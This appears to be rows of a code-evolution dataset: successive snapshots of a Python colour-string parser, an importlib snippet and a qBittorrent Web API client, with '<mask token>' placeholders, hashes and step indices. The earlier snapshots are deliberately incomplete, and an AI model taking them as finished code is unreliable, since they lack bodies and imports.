_meodai_best_names = json.loads(resources.read_text('pilutils.colornames',
'meodai-best.json'))
_meodai_names = json.loads(resources.read_text('pilutils.colornames',
'meodai.json'))
def parse_hex6(hex6):
"""Example: #ab34df"""
if (m := re.match('^#?([0-9A-Fa-f]{6})$', hex6.strip())):
h = int(m.group(1), 16)
return hex_to_rgb(h)
raise ValueError(f'String {hex6!r} does not match hex6 format.')
def parse_hex3(hex3):
"""Example: #a3d"""
if (m := re.match('^#?([0-9A-Fa-f]{3})$', hex3.strip())):
h3 = m.group(1)
return tuple(int(c * 2, 16) for c in h3)
raise ValueError(f'String {hex3!r} does not match hex3 format.')
def parse_rgbfunc_int(rgbfunc):
"""Example: rgb(171, 52, 223)"""
if (m := re.match(
'^rgb\\(\\s*(\\d{1,3})\\s*,\\s*(\\d{1,3})\\s*,\\s*(\\d{1,3})\\s*\\)$',
rgbfunc.strip())):
t = tuple(map(int, m.groups()))
if not any(n > 255 for n in t):
return t
raise ValueError(f'String {rgbfunc!r} does not match rgbfunc_int format.')
def parse_rgbfunc_float(rgbfunc):
"""Example: rgb(0.67, 0.2, 0.87)"""
if (m := re.match(
'^rgb\\(\\s*([01]\\.\\d+)\\s*,\\s*([01]\\.\\d+)\\s*,\\s*([01]\\.\\d+)\\s*\\)$'
, rgbfunc.strip())):
t = tuple(map(float, m.groups()))
if not any(n > 1 for n in t):
return tuple(int(round(n * 255)) for n in t)
raise ValueError(f'String {rgbfunc!r} does not match rgbfunc_float format.'
)
def parse_rgbfunc_percent(rgbfunc):
"""Example: rgb(67%, 20%, 87.5%)"""
if (m := re.match(
'^rgb\\(\\s*(\\d{1,3}(?:\\.\\d+)?)%\\s*,\\s*(\\d{1,3}(?:\\.\\d+)?)%\\s*,\\s*(\\d{1,3}(?:\\.\\d+)?)%\\s*\\)$'
, rgbfunc.strip())):
t = tuple(map(float, m.groups()))
if not any(n > 100 for n in t):
return tuple(int(round(n * 255 / 100)) for n in t)
raise ValueError(
f'String {rgbfunc!r} does not match rgbfunc_percent format.')
def parse_name_css(name):
name = name.lower()
if name not in _css_names:
raise ValueError(f'Color {name!r} is not named in the CSS dataset.')
return parse_hex6(_css_names[name])
def parse_name_crayola(name):
name = name.lower()
if name not in _crayola_names:
raise ValueError(f'Color {name!r} is not named in the crayola dataset.'
)
return parse_hex6(_crayola_names[name])
def parse_name_xkcd(name):
name = name.lower()
if name not in _xkcd_names:
raise ValueError(f'Color {name!r} is not named in the xkcd dataset.')
return parse_hex6(_xkcd_names[name])
def parse_name_meodai_best(name):
name = name.lower()
if name not in _meodai_best_names:
raise ValueError(
f'Color {name!r} is not named in the meodai-best dataset.')
return parse_hex6(_meodai_best_names[name])
def parse_name_meodai(name):
name = name.lower()
if name not in _meodai_names:
raise ValueError(f'Color {name!r} is not named in the meodai dataset.')
return parse_hex6(_meodai_names[name])
def parse(colstr, *, hex6=True, hex3=True, rgbfunc_int=True, rgbfunc_float=
True, rgbfunc_percent=True, name_css=True, name_crayola=True, name_xkcd
=True, name_meodai_best=True, name_meodai=True):
"""Combine all other parse functions into one "universal" function. Use kwargs to disable certain parsers."""
funcs = []
if hex6:
funcs.append(parse_hex6)
if hex3:
funcs.append(parse_hex3)
if rgbfunc_int:
funcs.append(parse_rgbfunc_int)
if rgbfunc_float:
funcs.append(parse_rgbfunc_float)
if rgbfunc_percent:
funcs.append(parse_rgbfunc_percent)
if name_css:
funcs.append(parse_name_css)
if name_crayola:
funcs.append(parse_name_crayola)
if name_xkcd:
funcs.append(parse_name_xkcd)
if name_meodai_best:
funcs.append(parse_name_meodai_best)
if name_meodai:
funcs.append(parse_name_meodai)
res = None
for func in funcs:
try:
res = func(colstr)
except ValueError:
pass
if res is None:
raise ValueError(f'Could not find a working parser for {colstr!r}.')
return res
| """Functions for parsing various strings to RGB tuples."""
import json
import re
from pathlib import Path
import importlib.resources as resources
from pilutils.basic import hex_to_rgb
__all__ = [
"parse_hex6",
"parse_hex3",
"parse_rgbfunc_int",
"parse_rgbfunc_float",
"parse_rgbfunc_percent",
"parse_name_css",
"parse_name_crayola",
"parse_name_xkcd",
"parse_name_meodai_best",
"parse_name_meodai",
"parse",
]
_css_names = json.loads(resources.read_text("pilutils.colornames", "css.json"))
_crayola_names = json.loads(resources.read_text("pilutils.colornames", "crayola.json"))
_xkcd_names = json.loads(resources.read_text("pilutils.colornames", "xkcd.json"))
_meodai_best_names = json.loads(
resources.read_text("pilutils.colornames", "meodai-best.json")
)
_meodai_names = json.loads(resources.read_text("pilutils.colornames", "meodai.json"))
def parse_hex6(hex6):
"""Example: #ab34df"""
if m := re.match(r"^#?([0-9A-Fa-f]{6})$", hex6.strip()):
h = int(m.group(1), 16)
return hex_to_rgb(h)
raise ValueError(f"String {hex6!r} does not match hex6 format.")
def parse_hex3(hex3):
"""Example: #a3d"""
if m := re.match(r"^#?([0-9A-Fa-f]{3})$", hex3.strip()):
h3 = m.group(1)
return tuple(int(c * 2, 16) for c in h3)
raise ValueError(f"String {hex3!r} does not match hex3 format.")
def parse_rgbfunc_int(rgbfunc):
"""Example: rgb(171, 52, 223)"""
if m := re.match(
r"^rgb\(\s*(\d{1,3})\s*,\s*(\d{1,3})\s*,\s*(\d{1,3})\s*\)$", rgbfunc.strip()
):
t = tuple(map(int, m.groups()))
if not any(n > 255 for n in t):
return t
raise ValueError(f"String {rgbfunc!r} does not match rgbfunc_int format.")
def parse_rgbfunc_float(rgbfunc):
"""Example: rgb(0.67, 0.2, 0.87)"""
if m := re.match(
r"^rgb\(\s*([01]\.\d+)\s*,\s*([01]\.\d+)\s*,\s*([01]\.\d+)\s*\)$",
rgbfunc.strip(),
):
t = tuple(map(float, m.groups()))
if not any(n > 1 for n in t):
return tuple(int(round(n * 255)) for n in t)
raise ValueError(f"String {rgbfunc!r} does not match rgbfunc_float format.")
def parse_rgbfunc_percent(rgbfunc):
"""Example: rgb(67%, 20%, 87.5%)"""
if m := re.match(
r"^rgb\(\s*(\d{1,3}(?:\.\d+)?)%\s*,\s*(\d{1,3}(?:\.\d+)?)%\s*,\s*(\d{1,3}(?:\.\d+)?)%\s*\)$",
rgbfunc.strip(),
):
t = tuple(map(float, m.groups()))
if not any(n > 100 for n in t):
return tuple(int(round(n * 255 / 100)) for n in t)
raise ValueError(f"String {rgbfunc!r} does not match rgbfunc_percent format.")
def parse_name_css(name):
name = name.lower()
if name not in _css_names:
raise ValueError(f"Color {name!r} is not named in the CSS dataset.")
return parse_hex6(_css_names[name])
def parse_name_crayola(name):
name = name.lower()
if name not in _crayola_names:
raise ValueError(f"Color {name!r} is not named in the crayola dataset.")
return parse_hex6(_crayola_names[name])
def parse_name_xkcd(name):
name = name.lower()
if name not in _xkcd_names:
raise ValueError(f"Color {name!r} is not named in the xkcd dataset.")
return parse_hex6(_xkcd_names[name])
def parse_name_meodai_best(name):
name = name.lower()
if name not in _meodai_best_names:
raise ValueError(f"Color {name!r} is not named in the meodai-best dataset.")
return parse_hex6(_meodai_best_names[name])
def parse_name_meodai(name):
name = name.lower()
if name not in _meodai_names:
raise ValueError(f"Color {name!r} is not named in the meodai dataset.")
return parse_hex6(_meodai_names[name])
def parse(
colstr,
*,
hex6=True,
hex3=True,
rgbfunc_int=True,
rgbfunc_float=True,
rgbfunc_percent=True,
name_css=True,
name_crayola=True,
name_xkcd=True,
name_meodai_best=True,
name_meodai=True,
):
"""Combine all other parse functions into one "universal" function. Use kwargs to disable certain parsers."""
funcs = []
if hex6:
funcs.append(parse_hex6)
if hex3:
funcs.append(parse_hex3)
if rgbfunc_int:
funcs.append(parse_rgbfunc_int)
if rgbfunc_float:
funcs.append(parse_rgbfunc_float)
if rgbfunc_percent:
funcs.append(parse_rgbfunc_percent)
if name_css:
funcs.append(parse_name_css)
if name_crayola:
funcs.append(parse_name_crayola)
if name_xkcd:
funcs.append(parse_name_xkcd)
if name_meodai_best:
funcs.append(parse_name_meodai_best)
if name_meodai:
funcs.append(parse_name_meodai)
res = None
for func in funcs:
try:
res = func(colstr)
except ValueError:
pass
if res is None:
raise ValueError(f"Could not find a working parser for {colstr!r}.")
return res
 | [7, 10, 12, 13, 14] |
698 | 8a773448383a26610f4798e12fb514248e71dc4b | <mask token>
| <mask token>
if __name__ == '__main__':
module = importlib.import_module('UserFile')
print(module.if_new_message)
print(module.ID)
| import importlib
if __name__ == '__main__':
module = importlib.import_module('UserFile')
print(module.if_new_message)
print(module.ID)
 | null | null | [0, 1, 2] |
699 | 8ce2db0a28de8ddd504b744f3c9210d1a0ed7d45 | <mask token>
class QBittorrentClient:
<mask token>
<mask token>
def login(self, username: str, password: str):
return self.connector.login(username, password)
def logout(self):
return self.connector.logout()
def get_application_version(self):
"""
Grab the application version of QBittorent.
Returns
-------
str
"""
return self.connector.request('GET', '/app/version')
def get_api_version(self):
"""
Grab the api version.
Returns
-------
str
"""
return self.connector.request('GET', '/app/webapiVersion')
<mask token>
<mask token>
<mask token>
def add_torrents(self, *links: str, **kwargs):
"""
Adds torrents
"""
defaults = {'torrents': None, 'savepath': None, 'cookie': None,
'category': None, 'skip_checking': None, 'root_folder': None,
'rename': None, 'upLimit': None, 'dlLimit': None, 'autoTMM':
None, 'sequentialDownload': None, 'firstLastPiecePrio': None}
payload = {k: kwargs.get(k, v) for k, v in defaults.items() if v or
kwargs.get(k)}
if len(links):
payload['urls'] = '\n'.join(links)
return self.connector.request('POST', '/torrents/add', payload=payload)
def pause_torrents(self, *hashes: str):
"""
Pauses torrents.
"""
payload = {'hashes': '|'.join(hashes)}
return self.connector.request('POST', '/torrents/pause', payload=
payload)
def resume_torrent(self, hashes: list):
"""
Resumes a single torrent.
"""
payload = {'hashes': '|'.join(hashes)}
return self.connector.request('POST', '/torrents/resume', payload=
payload)
| <mask token>
class QBittorrentClient:
<mask token>
def __init__(self, *, connector):
self.connector = connector
def login(self, username: str, password: str):
return self.connector.login(username, password)
def logout(self):
return self.connector.logout()
def get_application_version(self):
"""
Grab the application version of QBittorent.
Returns
-------
str
"""
return self.connector.request('GET', '/app/version')
def get_api_version(self):
"""
Grab the api version.
Returns
-------
str
"""
return self.connector.request('GET', '/app/webapiVersion')
def get_log(self, **kwargs):
"""
Grabs the log.
Parameters
----------
normal: bool, optional
Include normal messages
info: bool, optional
Include info messages
warning: bool, optional
Include warning messages
critical: bool, optional
Include critical messages
last_known_id: int, optional
Exclude messages with "message id" <= last_known_id
Returns
-------
dict
"""
payload = {'normal': kwargs.get('normal', True), 'info': kwargs.get
('info', True), 'warning': kwargs.get('warning', True),
'critical': kwargs.get('critical', True), 'last_known_id':
kwargs.get('last_known_id', -1)}
return self.connector.request('GET', '/log/main', payload=payload)
<mask token>
def get_torrent_info(self, torrent_hash: str):
payload = {'hash': torrent_hash}
return self.connector.request('POST', '/torrents/properties',
payload=payload)
def add_torrents(self, *links: str, **kwargs):
"""
Adds torrents
"""
defaults = {'torrents': None, 'savepath': None, 'cookie': None,
'category': None, 'skip_checking': None, 'root_folder': None,
'rename': None, 'upLimit': None, 'dlLimit': None, 'autoTMM':
None, 'sequentialDownload': None, 'firstLastPiecePrio': None}
payload = {k: kwargs.get(k, v) for k, v in defaults.items() if v or
kwargs.get(k)}
if len(links):
payload['urls'] = '\n'.join(links)
return self.connector.request('POST', '/torrents/add', payload=payload)
def pause_torrents(self, *hashes: str):
"""
Pauses torrents.
"""
payload = {'hashes': '|'.join(hashes)}
return self.connector.request('POST', '/torrents/pause', payload=
payload)
def resume_torrent(self, hashes: list):
"""
Resumes a single torrent.
"""
payload = {'hashes': '|'.join(hashes)}
return self.connector.request('POST', '/torrents/resume', payload=
payload)
| <mask token>
class QBittorrentClient:
"""
QBittorent client
"""
def __init__(self, *, connector):
self.connector = connector
def login(self, username: str, password: str):
return self.connector.login(username, password)
def logout(self):
return self.connector.logout()
def get_application_version(self):
"""
Grab the application version of QBittorent.
Returns
-------
str
"""
return self.connector.request('GET', '/app/version')
def get_api_version(self):
"""
Grab the api version.
Returns
-------
str
"""
return self.connector.request('GET', '/app/webapiVersion')
def get_log(self, **kwargs):
"""
Grabs the log.
Parameters
----------
normal: bool, optional
Include normal messages
info: bool, optional
Include info messages
warning: bool, optional
Include warning messages
critical: bool, optional
Include critical messages
last_known_id: int, optional
Exclude messages with "message id" <= last_known_id
Returns
-------
dict
"""
payload = {'normal': kwargs.get('normal', True), 'info': kwargs.get
('info', True), 'warning': kwargs.get('warning', True),
'critical': kwargs.get('critical', True), 'last_known_id':
kwargs.get('last_known_id', -1)}
return self.connector.request('GET', '/log/main', payload=payload)
def get_torrents(self, **kwargs):
"""
Gets the list of torrents.
Parameters
----------
filter: str, optional
Filter torrent list.
Allowed filters: all, downloading, completed, paused, active, inactive, resumed
category: str, optional
Get torrents with the given category
Empty string means "without category"
No "category" parameter means "any category"
sort: str, optional
Sort torrents by given key.
reverse: bool, optional
Enable reverse sorting.
limit: int, optional
Limit the number of torrents returned
offset: int, optional
Set offset (if less than 0, offset from end)
hashes: list or str, optional
Filter by hashes.
Returns
-------
dict
Property Type Description
hash string Torrent hash
name string Torrent name
size integer Total size (bytes) of files selected for download
progress float Torrent progress (percentage/100)
dlspeed integer Torrent download speed (bytes/s)
upspeed integer Torrent upload speed (bytes/s)
priority integer Torrent priority. Returns -1 if queuing is disabled or torrent is in seed mode
num_seeds integer Number of seeds connected to
num_complete integer Number of seeds in the swarm
num_leechs integer Number of leechers connected to
num_incomplete integer Number of leechers in the swarm
ratio float Torrent share ratio. Max ratio value: 9999.
eta integer Torrent ETA (seconds)
state string Torrent state. See table here below for the possible values
seq_dl bool True if sequential download is enabled
f_l_piece_prio bool True if first last piece are prioritized
category string Category of the torrent
super_seeding bool True if super seeding is enabled
force_start bool True if force start is enabled for this torrent
Possible values of state:
Value Description
error Some error occurred, applies to paused torrents
missingFiles Torrent data files is missing
uploading Torrent is being seeded and data is being transferred
pausedUP Torrent is paused and has finished downloading
queuedUP Queuing is enabled and torrent is queued for upload
stalledUP Torrent is being seeded, but no connection were made
checkingUP Torrent has finished downloading and is being checked
forcedUP Torrent is forced to uploading and ignore queue limit
allocating Torrent is allocating disk space for download
downloading Torrent is being downloaded and data is being transferred
metaDL Torrent has just started downloading and is fetching metadata
pausedDL Torrent is paused and has NOT finished downloading
queuedDL Queuing is enabled and torrent is queued for download
stalledDL Torrent is being downloaded, but no connection were made
checkingDL Same as checkingUP, but torrent has NOT finished downloading
forceDL Torrent is forced to downloading to ignore queue limit
checkingResumeData Checking resume data on qBt startup
moving Torrent is moving to another location
unknown Unknown status
"""
defaults = {'filter': None, 'category': None, 'sort': None,
'reverse': None, 'limit': None, 'offset': None}
payload = {k: kwargs.get(k, v) for k, v in defaults.items() if v or
kwargs.get(k)}
hashes = kwargs.get('hashes')
if hashes:
payload['hashes'] = '|'.join(hashes) if isinstance(hashes, list
) else hashes
return self.connector.request('POST', '/torrents/info', payload=payload
)
def get_torrent_info(self, torrent_hash: str):
payload = {'hash': torrent_hash}
return self.connector.request('POST', '/torrents/properties',
payload=payload)
def add_torrents(self, *links: str, **kwargs):
"""
Adds torrents
"""
defaults = {'torrents': None, 'savepath': None, 'cookie': None,
'category': None, 'skip_checking': None, 'root_folder': None,
'rename': None, 'upLimit': None, 'dlLimit': None, 'autoTMM':
None, 'sequentialDownload': None, 'firstLastPiecePrio': None}
payload = {k: kwargs.get(k, v) for k, v in defaults.items() if v or
kwargs.get(k)}
if len(links):
payload['urls'] = '\n'.join(links)
return self.connector.request('POST', '/torrents/add', payload=payload)
def pause_torrents(self, *hashes: str):
"""
Pauses torrents.
"""
payload = {'hashes': '|'.join(hashes)}
return self.connector.request('POST', '/torrents/pause', payload=
payload)
def resume_torrent(self, hashes: list):
"""
Resumes a single torrent.
"""
payload = {'hashes': '|'.join(hashes)}
return self.connector.request('POST', '/torrents/resume', payload=
payload)
| import json
from .errors import TorrentNotValid, TorrentHashNotFound, FailedLogin, HttpException
class QBittorrentClient:
"""
QBittorent client
"""
def __init__(self, *, connector):
self.connector = connector
def login(self, username: str, password: str):
return self.connector.login(username, password)
def logout(self):
return self.connector.logout()
def get_application_version(self):
"""
Grab the application version of QBittorent.
Returns
-------
str
"""
return self.connector.request('GET', '/app/version')
def get_api_version(self):
"""
Grab the api version.
Returns
-------
str
"""
return self.connector.request('GET', '/app/webapiVersion')
def get_log(self, **kwargs):
"""
Grabs the log.
Parameters
----------
normal: bool, optional
Include normal messages
info: bool, optional
Include info messages
warning: bool, optional
Include warning messages
critical: bool, optional
Include critical messages
last_known_id: int, optional
Exclude messages with "message id" <= last_known_id
Returns
-------
dict
"""
payload = {'normal': kwargs.get('normal', True), 'info': kwargs.get
('info', True), 'warning': kwargs.get('warning', True),
'critical': kwargs.get('critical', True), 'last_known_id':
kwargs.get('last_known_id', -1)}
return self.connector.request('GET', '/log/main', payload=payload)
def get_torrents(self, **kwargs):
"""
Gets the list of torrents.
Parameters
----------
filter: str, optional
Filter torrent list.
Allowed filters: all, downloading, completed, paused, active, inactive, resumed
category: str, optional
Get torrents with the given category
Empty string means "without category"
No "category" parameter means "any category"
sort: str, optional
Sort torrents by given key.
reverse: bool, optional
Enable reverse sorting.
limit: int, optional
Limit the number of torrents returned
offset: int, optional
Set offset (if less than 0, offset from end)
hashes: list or str, optional
Filter by hashes.
Returns
-------
dict
Property Type Description
hash string Torrent hash
name string Torrent name
size integer Total size (bytes) of files selected for download
progress float Torrent progress (percentage/100)
dlspeed integer Torrent download speed (bytes/s)
upspeed integer Torrent upload speed (bytes/s)
priority integer Torrent priority. Returns -1 if queuing is disabled or torrent is in seed mode
num_seeds integer Number of seeds connected to
num_complete integer Number of seeds in the swarm
num_leechs integer Number of leechers connected to
num_incomplete integer Number of leechers in the swarm
ratio float Torrent share ratio. Max ratio value: 9999.
eta integer Torrent ETA (seconds)
state string Torrent state. See table here below for the possible values
seq_dl bool True if sequential download is enabled
f_l_piece_prio bool True if first last piece are prioritized
category string Category of the torrent
super_seeding bool True if super seeding is enabled
force_start bool True if force start is enabled for this torrent
Possible values of state:
Value Description
error Some error occurred, applies to paused torrents
missingFiles Torrent data files is missing
uploading Torrent is being seeded and data is being transferred
pausedUP Torrent is paused and has finished downloading
queuedUP Queuing is enabled and torrent is queued for upload
stalledUP Torrent is being seeded, but no connection were made
checkingUP Torrent has finished downloading and is being checked
forcedUP Torrent is forced to uploading and ignore queue limit
allocating Torrent is allocating disk space for download
downloading Torrent is being downloaded and data is being transferred
metaDL Torrent has just started downloading and is fetching metadata
pausedDL Torrent is paused and has NOT finished downloading
queuedDL Queuing is enabled and torrent is queued for download
stalledDL Torrent is being downloaded, but no connection were made
checkingDL Same as checkingUP, but torrent has NOT finished downloading
forceDL Torrent is forced to downloading to ignore queue limit
checkingResumeData Checking resume data on qBt startup
moving Torrent is moving to another location
unknown Unknown status
"""
defaults = {'filter': None, 'category': None, 'sort': None,
'reverse': None, 'limit': None, 'offset': None}
payload = {k: kwargs.get(k, v) for k, v in defaults.items() if v or
kwargs.get(k)}
hashes = kwargs.get('hashes')
if hashes:
payload['hashes'] = '|'.join(hashes) if isinstance(hashes, list
) else hashes
return self.connector.request('POST', '/torrents/info', payload=payload
)
def get_torrent_info(self, torrent_hash: str):
payload = {'hash': torrent_hash}
return self.connector.request('POST', '/torrents/properties',
payload=payload)
def add_torrents(self, *links: str, **kwargs):
"""
Adds torrents
"""
defaults = {'torrents': None, 'savepath': None, 'cookie': None,
'category': None, 'skip_checking': None, 'root_folder': None,
'rename': None, 'upLimit': None, 'dlLimit': None, 'autoTMM':
None, 'sequentialDownload': None, 'firstLastPiecePrio': None}
payload = {k: kwargs.get(k, v) for k, v in defaults.items() if v or
kwargs.get(k)}
if len(links):
payload['urls'] = '\n'.join(links)
return self.connector.request('POST', '/torrents/add', payload=payload)
def pause_torrents(self, *hashes: str):
"""
Pauses torrents.
"""
payload = {'hashes': '|'.join(hashes)}
return self.connector.request('POST', '/torrents/pause', payload=
payload)
def resume_torrent(self, hashes: list):
"""
Resumes a single torrent.
"""
payload = {'hashes': '|'.join(hashes)}
return self.connector.request('POST', '/torrents/resume', payload=
payload)
| null | [
8,
11,
13,
14
] |